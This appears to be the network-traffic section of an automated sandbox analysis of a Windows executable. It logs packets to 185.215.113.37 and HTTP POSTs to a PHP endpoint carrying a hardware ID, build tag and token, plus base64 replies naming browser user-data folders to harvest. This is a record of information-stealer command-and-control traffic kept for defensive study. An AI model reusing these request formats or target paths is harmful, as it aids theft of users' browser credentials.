Oct 1, 2024 16:50:10.197771072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197776079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.197777033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197788000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197793961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197798967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197814941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197820902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197825909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197830915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197835922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197841883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197846889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197850943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.197853088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197899103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197902918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.197902918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.197972059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198075056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198081017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198086023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198091984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198096991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198101997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198112965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198117971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198127031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198127031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198132992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198138952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198143005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198148966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198158026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198167086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198189974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198210955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198210955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198218107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198227882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198232889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198237896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198242903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198257923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198263884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198265076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198268890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198275089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198280096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198307991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198307991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198345900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198352098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198362112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198367119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198376894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198389053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198395014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198395014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198395014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198426962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198447943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198738098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198748112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198753119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198757887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198764086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198770046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198776007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198781013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198786974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198786974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198791981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198797941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198802948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198807955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198812962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198817968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198828936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198833942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198839903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.198848009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198848009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198884964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.198884964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.231794119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.236675024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450053930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450076103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450087070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450160027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450170040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450181007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450191021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450202942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450223923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450243950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450253010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450263023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450272083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450274944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450304031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450337887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450349092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450360060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450370073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450380087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450392008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450402021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450412989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450424910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450424910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450433969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450444937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450454950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450464964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450467110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450467110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450474977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450485945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450496912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450505018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450531006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450531006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450551033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450567961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450577974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450584888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450612068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450629950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450668097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450680017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450695992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450705051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450716019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450725079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.450727940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450747967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.450767994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.538419008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.538434029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.538525105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574393988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574419975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574430943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574441910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574454069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574465990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574476957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574497938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574498892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574510098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574521065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574537039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574548006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574558020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574579954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574579954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574799061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574810982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574816942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574826956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574836969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574846983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574856997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574875116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574881077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574881077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574884892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574897051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574907064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574917078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574929953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574944973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574948072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574959993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574963093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.574970961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574985981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.574996948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.575011015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.575011015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.575011015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.575051069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.575051069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.575177908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.575189114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.575200081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.575232029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.575246096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.575246096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.575248957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.575262070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.575293064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.575293064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.575324059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:11.241621017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:11.241666079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:11.246365070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:11.294153929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:12.125379086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:12.125637054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:12.184554100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:12.189316988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:12.405011892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:12.405035019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:12.405045033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:12.405145884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:12.405172110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:12.407496929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:12.412280083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:12.628135920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:12.631653070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:12.644371986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:12.649224043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:13.358166933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:13.358283997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:13.411087990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:13.415894985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:13.635405064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:13.635421038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:13.635432959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:13.635509014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:13.635544062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:13.635545015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:13.635556936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:13.635622025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:13.637295008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:13.642123938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:14.354034901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:14.354104042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:19.178848028 CEST	49704	80	192.168.2.5	185.215.113.37

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 16:50:18.606194019 CEST	53	60675	1.1.1.1	192.168.2.5

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.37	80	1476	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 16:49:57.540054083 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 16:49:58.239839077 CEST	203	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:49:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 16:49:58.267704964 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBA Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 42 46 42 31 43 33 39 30 43 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 2d 2d 0d 0a Data Ascii: ------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="hwid"9BFB1C390C222838420810------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="build"doma------CBKJEGCBKKJECBGCGDBA--
Oct 1, 2024 16:49:58.502528906 CEST	407	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:49:58 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 7a 4e 6c 4d 44 67 32 5a 47 51 32 59 6a 5a 6b 4d 47 51 31 59 54 41 79 59 32 55 35 4e 44 41 7a 4e 6a 52 6a 4e 7a 52 68 59 57 51 32 59 32 4d 32 4e 6a 51 33 4e 47 59 79 4d 54 64 6d 4d 32 4d 34 4f 54 5a 6a 4f 57 4e 69 4d 7a 68 6c 5a 6d 52 68 5a 44 59 35 4e 44 64 69 4e 57 51 77 59 6a 59 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MzNlMDg2ZGQ2YjZkMGQ1YTAyY2U5NDAzNjRjNzRhYWQ2Y2M2NjQ3NGYyMTdmM2M4OTZjOWNiMzhlZmRhZDY5NDdiNWQwYjYzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 1, 2024 16:49:58.503904104 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFC Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 2d 2d 0d 0a Data Ascii: ------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="message"browsers------BAEBFIIECBGCBGDHCAFC--
Oct 1, 2024 16:49:58.726457119 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:49:58 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXN